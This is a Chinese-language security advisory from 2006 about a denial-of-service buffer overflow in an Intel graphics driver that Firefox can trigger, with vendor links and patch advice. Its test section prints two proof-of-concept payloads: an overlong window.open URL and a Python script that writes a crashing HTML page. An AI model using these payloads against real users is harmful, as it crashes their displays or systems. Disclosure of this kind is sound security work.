发布日期：2006-01-03
更新日期：2006-01-03

受影响系统：

Intel Graphics Accelerator driver 6.14.10.4308

描述：

---

BUGTRAQ  ID: 16127

Intel图形加速器可在Microsoft Windows系统中提高图形显示的性能。

Intel图形加速器驱动中存在远程拒绝服务漏洞。

如果在Mozilla Firefox中试图解析超长文本的话，就会触发缓冲区溢出，导致Windows显示管理器崩溃。在Windows XP上这个漏洞仅会导致显示管理器崩溃，但在Windows 2000 server上会导致蓝屏死机。

<*来源：Casiamo （casiamo@gmail.com）
        Sumit Siddharth （sumit.siddharth@gmail.com）
  
  链接：http://marc.theaimsgroup.com/?l=full-disclosure&m=113619729531199&w=2
        http://marc.theaimsgroup.com/?l=full-disclosure&m=113628207818847&w=2
        http://marc.theaimsgroup.com/?l=full-disclosure&m=113628806804318&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

1

<script>window.open("http://aa...");</script>
重复“a”大约53000次。

2

html = open("firefox.html", "w")
buff = 'A' * 50000
html.write("<html><head>\n"
"<script type=\"text/javascript\">\n"
"function bookmarksite(title, url){\n"
"if (document.all)\n"
"window.external.AddFavorite(url, title);\n"
"else if (window.sidebar)\n"
"window.sidebar.addPanel(title, url, \"\")}\n"
"</script></head>\n"
"<body onload=\"javascript:bookmarksite('"+buff+"',
'http://www.mozilla.org')\"
>\n"
"</body></html>")
html.close()

建议：

---

厂商补丁：

Intel
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://support.intel.com/support/graphics/

浏览次数：3246
严重程度：0（网友投票）